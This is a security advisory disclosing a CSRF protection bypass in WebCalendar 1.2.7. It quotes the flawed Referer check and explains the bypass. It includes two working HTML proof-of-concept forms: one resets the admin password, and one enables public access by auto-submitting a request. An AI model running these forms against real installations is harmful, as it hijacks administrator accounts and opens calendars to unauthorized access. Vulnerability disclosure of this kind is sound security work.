[+] Credits: John Page aka HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-CSRF-PROTECTION-BYPASS.txt [+] ISR: ApparitionSec Vendor: ========================== www.k5n.us/webcalendar.php Product: ================== WebCalendar v1.2.7 WebCalendar is a PHP-based calendar application that can be configured as a single-user calendar, a multi-user calendar for groups of users, or as an event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2, Interbase, MS SQL Server, or ODBC is required. WebCalendar can be setup in a variety of ways, such as... A schedule management system for a single person A schedule management system for a group of people, allowing one or more assistants to manage the calendar of another user An events schedule that anyone can view, allowing visitors to submit new events A calendar server that can be viewed with iCalendar-compliant calendar applications like Mozilla Sunbird, Apple iCal or GNOME Evolution or RSS-enabled applications like Firefox, Thunderbird, RSSOwl, FeedDemon, or BlogExpress. Vulnerability Type: ====================== CSRF PROTECTION BYPASS CVE Reference: ============== N/A Vulnerability Details: ===================== WebCalendar attempts to uses the HTTP Referer to check that requests are originating from same server as we see below. >From WebCalendar "include/functions.php" file on line 6117: //////////////////////////////////////////////////////////// function require_valide_referring_url () { global $SERVER_URL; if ( empty( $_SERVER['HTTP_REFERER'] ) ) { // Missing the REFERER value //die_miserable_death ( translate ( 'Invalid referring URL' ) ); // Unfortunately, some version of MSIE do not send this info. return true; } if ( ! preg_match ( "@$SERVER_URL@i", $_SERVER['HTTP_REFERER'] ) ) { // Gotcha. URL of referring page is not the same as our server. // This can be an instance of XSRF. // (This may also happen when more than address is used for your server. // However, you're not supposed to do that with this version of // WebCalendar anyhow...) die_miserable_death ( translate ( 'Invalid referring URL' ) ); } } ///////////////////////////////////////////////////////////////////////////////////////// However, this can be easily defeated by just not sending a referer. HTML 5 includes a handy tag <meta name="referrer" content="none"> to omit the referer when making an HTTP request, currently supported in Chrome, Safari, MobileSafari and other WebKit-based browsers. Using this meta tag we send no referrer and the vulnerable application will then happily process our CSRF requests. Exploit code(s): =============== 1) CSRF Protection Bypass to change Admin password POC. Note: Name of the victim user is required for success. <meta name="referrer" content="none"> <form id="CSRF" action="http://localhost/WebCalendar-1.2.7/edit_user_handler.php" method="post"> <input type="hidden" name="formtype" value="setpassword" /> <input type="hidden" name="user" value="admin" /> <input name="upassword1" id="newpass1" type="password" value="1234567" /> <input name="upassword2" id="newpass2" type="password" value="1234567" /> </form> 2) CSRF Protection Bypass modify access controls under "System Settings" / "Allow public access" <meta name="referrer" content="none"> <form id="CSRF_ACCESS_CTRL" action="http://localhost/WebCalendar-1.2.7/admin.php" method="post" name="prefform"><br /> <input type="hidden" name="currenttab" id="currenttab" value="settings" /> <input type="submit" value="Save" name="" /> <input type="hidden" name="admin_PUBLIC_ACCESS" value="Y" /> <script>document.getElementById('CSRF_ACCESS_CTRL').submit()</script> </form> Disclosure Timeline: =============================== Vendor Notification: No replies July 4, 2016 : Public Disclosure Exploitation Technique: ======================= Remote Severity Level: ================ 6.8 (Medium) CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. HYP3RLINX